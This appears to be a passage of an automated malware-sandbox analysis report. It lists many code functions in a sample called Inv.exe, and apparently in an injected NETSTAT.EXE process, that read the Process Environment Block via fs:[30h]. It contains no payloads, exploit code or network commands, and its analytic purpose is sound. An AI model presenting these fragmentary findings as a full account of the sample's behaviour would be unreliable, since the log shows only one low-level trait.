Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197B390 mov eax, dword ptr fs:[00000030h] 1_2_0197B390
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h] 1_2_01951B8F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01951B8F mov eax, dword ptr fs:[00000030h] 1_2_01951B8F
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FD380 mov ecx, dword ptr fs:[00000030h] 1_2_019FD380
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0138A mov eax, dword ptr fs:[00000030h] 1_2_01A0138A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974BAD mov eax, dword ptr fs:[00000030h] 1_2_01974BAD
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h] 1_2_019C53CA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C53CA mov eax, dword ptr fs:[00000030h] 1_2_019C53CA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019703E2 mov eax, dword ptr fs:[00000030h] 1_2_019703E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196DBE9 mov eax, dword ptr fs:[00000030h] 1_2_0196DBE9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0131B mov eax, dword ptr fs:[00000030h] 1_2_01A0131B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194F358 mov eax, dword ptr fs:[00000030h] 1_2_0194F358
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194DB40 mov eax, dword ptr fs:[00000030h] 1_2_0194DB40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h] 1_2_01973B7A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01973B7A mov eax, dword ptr fs:[00000030h] 1_2_01973B7A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194DB60 mov ecx, dword ptr fs:[00000030h] 1_2_0194DB60
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18B58 mov eax, dword ptr fs:[00000030h] 1_2_01A18B58
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h] 1_2_0197D294
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197D294 mov eax, dword ptr fs:[00000030h] 1_2_0197D294
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0195AAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195AAB0 mov eax, dword ptr fs:[00000030h] 1_2_0195AAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FAB0 mov eax, dword ptr fs:[00000030h] 1_2_0197FAB0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019452A5 mov eax, dword ptr fs:[00000030h] 1_2_019452A5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972ACB mov eax, dword ptr fs:[00000030h] 1_2_01972ACB
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972AE4 mov eax, dword ptr fs:[00000030h] 1_2_01972AE4
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h] 1_2_0194AA16
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AA16 mov eax, dword ptr fs:[00000030h] 1_2_0194AA16
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov ecx, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01945210 mov eax, dword ptr fs:[00000030h] 1_2_01945210
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01963A1C mov eax, dword ptr fs:[00000030h] 1_2_01963A1C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01958A0A mov eax, dword ptr fs:[00000030h] 1_2_01958A0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h] 1_2_01984A2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01984A2C mov eax, dword ptr fs:[00000030h] 1_2_01984A2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18A62 mov eax, dword ptr fs:[00000030h] 1_2_01A18A62
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019D4257 mov eax, dword ptr fs:[00000030h] 1_2_019D4257
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01949240 mov eax, dword ptr fs:[00000030h] 1_2_01949240
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198927A mov eax, dword ptr fs:[00000030h] 1_2_0198927A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0EA55 mov eax, dword ptr fs:[00000030h] 1_2_01A0EA55
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h] 1_2_019FB260
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FB260 mov eax, dword ptr fs:[00000030h] 1_2_019FB260
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h] 1_2_0197FD9B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197FD9B mov eax, dword ptr fs:[00000030h] 1_2_0197FD9B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h] 1_2_01A105AC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A105AC mov eax, dword ptr fs:[00000030h] 1_2_01A105AC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01972581 mov eax, dword ptr fs:[00000030h] 1_2_01972581
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01942D8A mov eax, dword ptr fs:[00000030h] 1_2_01942D8A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01971DB5 mov eax, dword ptr fs:[00000030h] 1_2_01971DB5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019735A1 mov eax, dword ptr fs:[00000030h] 1_2_019735A1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0FDE2 mov eax, dword ptr fs:[00000030h] 1_2_01A0FDE2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov ecx, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6DC9 mov eax, dword ptr fs:[00000030h] 1_2_019C6DC9
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019F8DF1 mov eax, dword ptr fs:[00000030h] 1_2_019F8DF1
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0195D5E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18D34 mov eax, dword ptr fs:[00000030h] 1_2_01A18D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A0E539 mov eax, dword ptr fs:[00000030h] 1_2_01A0E539
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01953D34 mov eax, dword ptr fs:[00000030h] 1_2_01953D34
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0194AD30 mov eax, dword ptr fs:[00000030h] 1_2_0194AD30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019CA537 mov eax, dword ptr fs:[00000030h] 1_2_019CA537
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01974D3B mov eax, dword ptr fs:[00000030h] 1_2_01974D3B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01967D50 mov eax, dword ptr fs:[00000030h] 1_2_01967D50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01983D43 mov eax, dword ptr fs:[00000030h] 1_2_01983D43
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C3540 mov eax, dword ptr fs:[00000030h] 1_2_019C3540
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h] 1_2_0196C577
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196C577 mov eax, dword ptr fs:[00000030h] 1_2_0196C577
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195849B mov eax, dword ptr fs:[00000030h] 1_2_0195849B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A014FB mov eax, dword ptr fs:[00000030h] 1_2_01A014FB
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6CF0 mov eax, dword ptr fs:[00000030h] 1_2_019C6CF0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18CD6 mov eax, dword ptr fs:[00000030h] 1_2_01A18CD6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C6C0A mov eax, dword ptr fs:[00000030h] 1_2_019C6C0A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A01C06 mov eax, dword ptr fs:[00000030h] 1_2_01A01C06
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1740D mov eax, dword ptr fs:[00000030h] 1_2_01A1740D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197BC2C mov eax, dword ptr fs:[00000030h] 1_2_0197BC2C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h] 1_2_019DC450
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DC450 mov eax, dword ptr fs:[00000030h] 1_2_019DC450
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A44B mov eax, dword ptr fs:[00000030h] 1_2_0197A44B
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196746D mov eax, dword ptr fs:[00000030h] 1_2_0196746D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01958794 mov eax, dword ptr fs:[00000030h] 1_2_01958794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C7794 mov eax, dword ptr fs:[00000030h] 1_2_019C7794
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019837F5 mov eax, dword ptr fs:[00000030h] 1_2_019837F5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0196F716 mov eax, dword ptr fs:[00000030h] 1_2_0196F716
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h] 1_2_019DFF10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFF10 mov eax, dword ptr fs:[00000030h] 1_2_019DFF10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h] 1_2_0197A70E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A70E mov eax, dword ptr fs:[00000030h] 1_2_0197A70E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197E730 mov eax, dword ptr fs:[00000030h] 1_2_0197E730
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h] 1_2_01A1070D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A1070D mov eax, dword ptr fs:[00000030h] 1_2_01A1070D
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h] 1_2_01944F2E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01944F2E mov eax, dword ptr fs:[00000030h] 1_2_01944F2E
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18F6A mov eax, dword ptr fs:[00000030h] 1_2_01A18F6A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195EF40 mov eax, dword ptr fs:[00000030h] 1_2_0195EF40
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0195FF60 mov eax, dword ptr fs:[00000030h] 1_2_0195FF60
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A10EA5 mov eax, dword ptr fs:[00000030h] 1_2_01A10EA5
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019DFE87 mov eax, dword ptr fs:[00000030h] 1_2_019DFE87
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019C46A7 mov eax, dword ptr fs:[00000030h] 1_2_019C46A7
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019736CC mov eax, dword ptr fs:[00000030h] 1_2_019736CC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019FFEC0 mov eax, dword ptr fs:[00000030h] 1_2_019FFEC0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01988EC7 mov eax, dword ptr fs:[00000030h] 1_2_01988EC7
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019716E0 mov ecx, dword ptr fs:[00000030h] 1_2_019716E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01A18ED6 mov eax, dword ptr fs:[00000030h] 1_2_01A18ED6
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019576E2 mov eax, dword ptr fs:[00000030h] 1_2_019576E2
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h] 1_2_0197A61C
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0197A61C mov eax, dword ptr fs:[00000030h] 1_2_0197A61C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42AE4 mov eax, dword ptr fs:[00000030h] 4_2_02E42AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E42ACB mov eax, dword ptr fs:[00000030h] 4_2_02E42ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E152A5 mov eax, dword ptr fs:[00000030h] 4_2_02E152A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E2AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E2AAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E2AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4FAB0 mov eax, dword ptr fs:[00000030h] 4_2_02E4FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h] 4_2_02E4D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E4D294 mov eax, dword ptr fs:[00000030h] 4_2_02E4D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h] 4_2_02ECB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02ECB260 mov eax, dword ptr fs:[00000030h] 4_2_02ECB260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EE8A62 mov eax, dword ptr fs:[00000030h] 4_2_02EE8A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5927A mov eax, dword ptr fs:[00000030h] 4_2_02E5927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E19240 mov eax, dword ptr fs:[00000030h] 4_2_02E19240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDEA55 mov eax, dword ptr fs:[00000030h] 4_2_02EDEA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EA4257 mov eax, dword ptr fs:[00000030h] 4_2_02EA4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h] 4_2_02E54A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E54A2C mov eax, dword ptr fs:[00000030h] 4_2_02E54A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3A229 mov eax, dword ptr fs:[00000030h] 4_2_02E3A229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E28A0A mov eax, dword ptr fs:[00000030h] 4_2_02E28A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov ecx, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E15210 mov eax, dword ptr fs:[00000030h] 4_2_02E15210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h] 4_2_02E1AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h] 4_2_02E1AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h] 4_2_02EDAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h] 4_2_02EDAA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E33A1C mov eax, dword ptr fs:[00000030h] 4_2_02E33A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h] 4_2_02E403E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E3DBE9 mov eax, dword ptr fs:[00000030h] 4_2_02E3DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h] 4_2_02E953CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h] 4_2_02E44BAD
